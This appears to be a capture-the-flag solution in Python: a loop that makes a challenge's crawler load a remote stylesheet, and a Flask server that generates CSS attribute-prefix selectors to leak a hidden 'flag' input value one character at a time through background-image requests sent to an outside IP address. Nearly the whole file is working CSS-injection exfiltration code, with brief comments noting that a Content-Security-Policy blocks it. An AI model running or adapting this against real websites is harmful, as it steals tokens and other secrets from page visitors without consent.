import requests

import time

# Trigger script: repeatedly asks the challenge's crawl endpoint to load an
# externally hosted stylesheet. The request was exported from an intercepting
# proxy; cookies and headers are reproduced as captured.
session = requests.session()

target_url = "http://node4.anna.nssctf.cn:28872/crawl.html"

captured_cookies = {
    "UM_distinctid": "176929086fa3a0-0b0ed985080c69-163b6153-13c680-176929086fb472",
    "_ga": "GA1.2.602800589.1608776974",
    "_gid": "GA1.2.1740085603.1609750409",
}

# NOTE(review): Origin and Referer name a different host than target_url;
# they look like leftovers from an earlier capture and are kept unchanged.
captured_headers = {
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
    "Origin": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Referer": "http://2c1fe10e-fee9-4956-b0f4-f87a2de7a0dc.node3.buuoj.cn/",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}

# The only form field is the stylesheet URL. Presumably the crawler renders the
# page with this stylesheet applied (the handler is not shown here); an
# endpoint that accepts an arbitrary external style URL is the input this
# challenge relies on.
form_fields = {"css": "http://165.154.5.221:7001/poc.css"}

# Each pass makes the crawler fetch a fresh copy of the stylesheet; the
# three-second pause separates consecutive submissions.
while True:
    session.post(
        target_url,
        headers=captured_headers,
        cookies=captured_cookies,
        data=form_fields,
    )
    time.sleep(3)
from flask import Flask
# Flask application that serves the generated stylesheet and receives the
# image-fetch callbacks.
app = Flask(__name__)

# Candidate characters tried for the next position of the attribute value.
dic = (
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789"
    "{}-"
)

# Prefix observed so far; overwritten by the callback route on every hit.
result = ""

@app.route('/poc.css')
def payload():
    """Return a stylesheet with one attribute-prefix rule per candidate character.

    Each rule matches the siblings that follow an ``input[name=flag]`` whose
    ``value`` starts with the known prefix plus one candidate, and gives them a
    background image whose URL carries that prefix. A browser that applies the
    sheet requests only the image for the rule that matches, so the request
    path reveals one more character of the value.

    The leak depends on the secret sitting in a DOM attribute and on the page
    being allowed to load external styles and images; a Content-Security-Policy
    limiting ``style-src`` and ``img-src`` removes both conditions.

    Returns:
        A ``(body, status, headers)`` tuple with a ``text/css`` content type.
    """
    # ``result`` is only read here, so no ``global`` declaration is needed.
    rules = []
    for candidate in dic:
        prefix = result + candidate
        rules.append(
            '''input[name=flag][value^="''' + prefix
            + '''"] ~ * {background-image:url("http://165.154.5.221:7001/'''
            + prefix + '''");}\n'''
        )
    return ''.join(rules), 200, [("Content-Type", "text/css")]

@app.route('/<flag>')
def all(flag):
    """Record the path segment of a callback as the prefix known so far.

    The route accepts any single path segment, so whatever path is requested
    last becomes the new ``result`` used when building the next stylesheet.
    The segment is also printed and echoed back as the response body.

    NOTE(review): the function name shadows the builtin ``all`` within this
    module; nothing visible here calls the builtin.
    """
    global result
    print(flag)
    result = flag
    return flag

# Start Flask's built-in server. Binding to 0.0.0.0 listens on every network
# interface of the host, on the same port the generated stylesheet URLs use.
app.run(
    host='0.0.0.0',
    port=7001,
)

很慢很慢